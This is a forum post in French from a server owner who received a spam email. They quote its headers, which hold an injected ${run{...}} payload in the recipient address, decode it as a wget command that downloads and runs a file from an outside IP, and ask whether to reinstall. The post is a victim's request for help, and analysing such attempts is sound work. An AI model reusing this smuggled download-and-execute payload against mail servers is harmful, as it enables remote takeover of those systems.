Bonjour,
J’ai reçu un mail très bizarre ce mail qui a été classé en spam d’ailleurs :
Return-Path: SRS0=+aha=UZ=njt.com=root@mondomain.fr
Delivered-To: monmail+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@mondomain.fr
Received: from njt.com (us-east1b.itmerri.com [138.68.7.199])
by mondomain.fr (Postfix) with SMTP id C96EF1601BE
for root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@mondomain.fr; Wed, 26 Jun 2019 02:19:37 +0200 (CEST)
Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31
X-Spam: Yes
Dans Thunderbird, le mail est vide. Le mail semble contenir une commande qui télécharge un fichier et le lance :
${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}
En clair, ça donne ça ?
run{/bin/sht-ct’wget 65.181.120.163/stfinracu’}
J’ai essayé de télécharger le fichier 65.181.120.163/stfinracu mais j’ai une erreur 404.
Qu’en pensez-vous ? Dois-je réinstaller mon serveur ?